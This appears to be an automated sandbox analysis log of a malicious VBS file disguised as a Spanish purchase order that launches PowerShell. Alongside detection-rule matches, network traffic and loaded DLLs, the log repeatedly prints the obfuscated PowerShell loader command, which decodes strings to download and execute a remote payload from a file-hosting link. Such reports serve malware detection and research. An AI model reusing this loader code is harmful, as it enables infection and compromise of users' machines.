      Source: powershell.exe, 00000002.00000002.1646952712.000001E99B05F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.8:49706 version: TLS 1.2

      System Summary

      barindex
      Source: amsi64_432.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 432, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFor
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAForJump to behavior
      Source: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7558
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7558Jump to behavior
      Source: amsi64_432.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.expl.evad.winVBS@4/5@2/2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Benzinforhandlers.xanJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov434nxa.hxo.ps1Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbsReversingLabs: Detection: 31%
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAForJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
